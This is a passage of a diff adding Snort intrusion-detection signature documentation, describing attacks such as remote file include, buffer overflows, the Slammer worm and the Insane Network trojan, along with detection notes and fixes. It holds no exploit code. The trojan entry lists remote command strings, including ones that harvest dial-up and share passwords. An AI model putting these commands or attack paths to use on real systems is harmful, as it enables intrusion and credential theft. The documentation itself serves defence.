+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_delete.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2898.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2898
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_unique_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2387.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2387
+
+--
+Summary:
+This event is generated when an attempt is made to view a URL with the string "view_broadcast.cgi" in the name.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+A vulnerabilities exists in Apple Quick Time Streaming Server and
+Apple Darwin Streaming Server running on Windows hosts, that may allow
+a denial of service to occur.  This happens when expected parameters are not 
+supplied to this script, causing the server to fail to accept new connections.
+
+--
+Affected Systems:
+QuickTime/Darwin Streaming Server 4.1.3e and earlier on Windows
+
+--
+Attack Scenarios:
+An attacker can craft a packet that contains a URL with the location of the view_broadcast.cgi script and not pass it required parameters.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the systems affected.
+
+Upgrade to the latest non affected versions of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak<judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/8257
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0422
+
+--
--- /dev/null
+++ b/doc/signatures/100000370.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000370
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_groups.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_groups.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000637.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000637
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_duplicate.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_duplicate.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2023.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2023
+
+--
+Summary:
+The RPC service mountd enables clients to connect to networked file 
+machine being dismounted via UDP.
+
+--
+Impact:
+Denial of network resources to users on the local area network.
+
+--
+Detailed Information:
+This may be an attempt to deny access to network resources from an 
+unauthorized source. It may also be indicative of an attacker probing 
+for RPC services on a host in an attempt to discover a possible entry 
+point to network resources via a vulnerable daemon.
+
+--
+Affected Systems:
+All systems allowing network shares to be unmounted by anonymous hosts, 
+all systems allowing RPC services to be stopped by ordinary users and 
+systems already compromised by an attacker via another vulnerability.
+
+--
+Attack Scenarios:
+This is an intelligence gathering activity, the attacker could remotely 
+unmount a shared resource to deny a resource to the local area network 
+or a probe to discover possible routes of entry into a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+When allowing hosts to mount an external network share, consider using a
+hosts.allow file.
+
+Do not allow shares to be unmounted by unauthorized hosts or users.
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2451.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2451
+
+--
+Summary:
+This event is generated when a user in your network has successfully registered with a Yahoo Instant Messenger server to receive voice chat messages or is receiving voice chat messages.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+Yahoo IM voice chat allows IM users to exchange audio messages.  This activity may not be appropriate in a corporate environment.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+This particular type of Yahoo IM exchange has no known attacks, however it may represent a policy violation because the host is running Yahoo IM.
+
+--
+Ease of Attack:
+Easy to exchange voice messages.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/1342.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1341
+
+--
+Summary:
+Attempted gcc command access via web
+
+--
+Impact:
+Attempt to compile a binary on a host.
+
+--
+Detailed Information:
+This is an attempt to compiile a C or C++ source on a host. The gcc command is the GNU project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could possibly compile a program needed for other attacks on the system or install a binary program of his choosing.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'gcc'in the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. This command may also be requested on a command line should the attacker gain access to the machine. Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to prevent files from being added to the host. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased).
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+sid: 1342
+sid: 1343
+sid: 1344
+sid: 1345
+sid: 1346
+sid: 1347
+sid: 1348
+
+--
--- /dev/null
+++ b/doc/signatures/100000787.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000787
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "ATutor" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "submit" parameter in the "fix_content.php" script used by the "ATutor" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using ATutor
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1406.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1406
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2126.txt
@@ -0,0 +1,129 @@
+Rule:
+
+--
+
+Sid:
+2126
+
+--
+
+Summary:
+This event is generated when a remote attacker attempts to overflow Microsoft's
+PPTP RAS service.  
+
+--
+
+Impact:
+Administrative Compromise.  This attack may permit executation of arbitrary
+commands with the privileges of the NT SYSTEM account.
+
+--
+
+Detailed Information:
+A buffer overflow exists when a malformed SCR (Start Control Request) PPTP 
+packet is received by the PPTP RAS service.  This may permit executation of
+arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+Windows 2000 Professional
+Windows 2000 Server
+Windows 2000 Advanced Server
+
+--
+
+Attack Scenarios:
+Exploit code can be used to attack vulnerable PPTP RAS services to obtain
+SYSTEM level access to the remote host.
+
+--
+
+Ease of Attack:
+Difficult.  Currently Sourcefire is unaware of any publicly available 
+exploits for this vulnerability.
+
+--
+
+False Positives:
+PPTP clients that violate RFC2637 by generating overly long Host Name and
+Vendor Strings could potentially trigger this rule inadvertently.
+
+--
+
+False Negatives:
+None Known.
+
+--
+
+Corrective Action:
+Microsoft as released the following patches to correct the problem:
+
+Microsoft Windows 2000 Professional SP3:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Server SP3:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Advanced Server SP3:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Terminal Services SP3:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Advanced Server SP2:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Professional SP2:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Server SP2:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows 2000 Terminal Services SP2:
+
+    Microsoft Patch Q329834
+    http://www.microsoft.com/windows2000/downloads/critical/q329834/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D43606%26redirect%3Dno
+
+Microsoft Windows XP Home SP1:
+
+    Microsoft Patch Q329834
+    http://download.microsoft.com/download/whistler/Patch/Q329834/WXP/EN-US/Q329834_WXP_SP2_x86_ENU.exe
+
+Microsoft Windows XP Professional SP1:
+
+    Microsoft Patch Q329834
+    http://download.microsoft.com/download/whistler/Patch/Q329834/WXP/EN-US/Q329834_WXP_SP2_x86_ENU.exe
+
+Microsoft Windows XP 64-bit Edition SP1:
+
+    Microsoft Patch Q329834
+    http://download.microsoft.com/download/whistler/Patch/Q329834/W64XP/EN-US/Q329834_WXP_SP2_ia64_ENU.exe
+
+--
+
+Contributors:
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1214
+http://www.securityfocus.com/bid/5807
+
+
+--
--- /dev/null
+++ b/doc/signatures/1245.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1245
+
+--
+Summary:
+This event is generated when an attempt is made to access the .idq Indexing Service ISAPI filter. 
+
+--
+Impact:
+Intelligence gathering activity. If an .idq file is erroneously shared from a network share, an error message is returned from a request that contains the share path will be disclosed.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) installs several Internet Service Application Programming Interface (ISAPI) extensions.  The .idq ISAPI filter provides support for Internet Data Queries.  Files with the .idq suffix should not be located on network shares.  If an attempt is made to access them from a network share, an error message is returned disclosing the share path.  
+
+--
+Affected Systems:
+Hosts running IIS 4.0
+Hosts running IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can attempt to access a file with the .idq suffix in an attempt to receive an error message with disclosure about the share path.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Do not place files with the .idq suffix on a network share.
+ 
+
+--
+Contributors:
+Original rule written by Dr SuSE and C. Mayor 
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS552
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0071
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000552.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000552
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "SmartSiteCMS" application running on a webserver. 
+Access to the file "inc_foot.php" using a remote file being passed as the 
+"root" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "root" parameter in the "inc_foot.php" script used by 
+the "SmartSiteCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SmartSiteCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2671.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2671
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Internet Explorer.
+
+--
+Impact:
+A successful attack can cause a buffer overflow and present the attacker
+with the opportunity to execute code of their choosing on a vulnerable
+system.
+
+--
+Detailed Information:
+An error in the processing of bitmap images exists in Internet Explorer
+that can present an attacker with the opportunity to execute code of
+their choosing on a vulnerable system.
+
+The error exists due to poor boundary checking in the processing of
+bitmap images.
+
+--
+Affected Systems:
+	Microsoft Windows using Internet Explorer
+
+--
+Attack Scenarios:
+An attacker would need to supply a malformed bitmap image either in a
+web page or possibly via HTML email to a victim host.
+
+--
+Ease of Attack:
+Simple, exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/ms04-025.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/3015.txt
@@ -0,0 +1,90 @@
+Rule: 
+
+--
+Sid: 
+3015
+-- 
+Summary: 
+This event is generated when an attempt is made to request a connection on port 2000 using the Insane Network 4.0 trojan.
+
+-- 
+
+Impact: 
+If connected, the attacker could remotetly execute a multitude of functions resulting in a full compromise of the victim's machine.
+
+--
+Detailed Information:
+Insane Network 4.0 uses port 2000 as its default, but -2000, or port 63536, incarnations also exist.
+Insane Network 4.0 has a number of functions. The following strings are indicative of a particular Insane Network 4.0 attack.
+Be aware that some versions of Insane Network 4.0 will send their attack strings one letter at a time. For example,
+to send the bomb command, some versions will send only one letter per packet, resulting in bomb being spelled out in multiple packets.
+
+Format: Name of function (Description of what it does *only if necessary*) - string to look for
+
+Bomb ("Bombs" monitor) - bomb
+Snow (Makes monitor snowy) - snow
+Melt ("Melts" the screen) - melt
+Reverse (Reverses screen) - reverse
+Copy File - cp followed by a file name and the destination path
+Ctrl-Alt-Del (Enable/Disable Ctrl-Alt-Del) - cad -e (for enable) cad -d (for disable)
+Delete File - rm followed by a file name, including path
+File List - ls followed by directory
+File Sharing (Gets shared file password information) - share
+Dial-Up Passwords (Get Dial-up password information) - passwd
+Make Text File - mktext
+Popup Message - popup
+Read File - cat followed by a file name, including path
+Reboot - reboot
+Registry Edit - regrun
+Rename File - ren followed by a file and its new name
+Run File - exec followed by a file name, including path
+Shutdown - shutdown
+Taskbar (Enable/Disable Task Bar) - task -e (for enable) tast -d (for disable)
+Telnet - telnet
+
+--
+Affected Systems:
+Windows 95/98/ME/NT/2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address, port number (which 
+is assigned to the server program by the attacker: default is 2000), and presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+Remove insane network.exe and commands.txt
+Kill insane network.exe in the process list
+
+Keep your anti-virus software updated with the latest virus definitions.
+
+--
+Contributors:
+Original Rule Writer: Ricky Macatee <rmacatee@sourcefire.com> 
+Sourcefire Research Team
+
+-- 
+Additional References:
+http://www.pestpatrol.com/PestInfo/i/insane_network.asp
+
+
+--
--- /dev/null
+++ b/doc/signatures/3309.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3309
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000358.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000358
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BASE" application running on a webserver. Access to the file "base_include.inc.php" using a remote file being passed as the "BASE_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "BASE_path" parameter in the "base_include.inc.php" script used by the "BASE" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BASE
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2004.txt
@@ -0,0 +1,85 @@
+Rule:  
+
+--
+Sid:
+2004
+
+--
+Summary:
+This event is generated when an attempt is made by the "Slammer" worm to
+compromise a Microsoft SQL Server. Specifically, this rule generates an 
+event when the worm activity eminates from the protected network.
+
+--
+Impact:
+A worm targeting a vulnerability in the MS SQL Server 2000 Resolution 
+Service was released on January 25th, 2003.  The worm attempts to 
+exploit a buffer overflow in the Resolution Service.  Because of the 
+nature of the vulnerability, the worm is able to attempt to compromise 
+other machines very rapidly.
+
+--
+Detailed Information:
+The Monitor Service provided by MS SQL and MSDE uses unchecked client
+provided data in an SQL version check function.
+
+The worm attempts to exploit a buffer overflow in this version request.
+If the worm sends too many bytes in the request that triggers the 
+version check, then a buffer overflow condition is triggered resulting 
+in a potential compromise of the SQL Server.
+
+This event is indicative of an existing infection on the protected 
+network. The event is generated on outgoing traffic.
+
+--
+Affected Systems:
+This vulnerability is present in unpatched MS SQL Servers.  The 
+following unpatched services containing MS SQL or Microsoft Desktop 
+Engine (MSDE) may potentially be compromised by this worm:
+
+* SQL Server 2000 (Developer, Standard, and Enterprise Editions)
+* Visual Studio .NET (Architect, Developer, and Professional Editions)
+* ASP.NET Web Matrix Tool
+* Office XP Developer Edition
+* MSDN Universal and Enterprise subscriptions
+
+--
+Attack Scenarios:
+This is worm activity.
+
+--
+Ease of Attack:
+Exploits for this vulnerability have been publicly published.
+
+A worm has been written that automatically exploits this vulnerability.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+Block external access to the MS SQL services on port 1433 and 1434 if 
+possible.
+
+Patches from Microsoft are available that fix this vulnerability.  The 
+patches are available from
+
+www.microsoft.com/technet/security/bulletin/MS02-039.asp
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
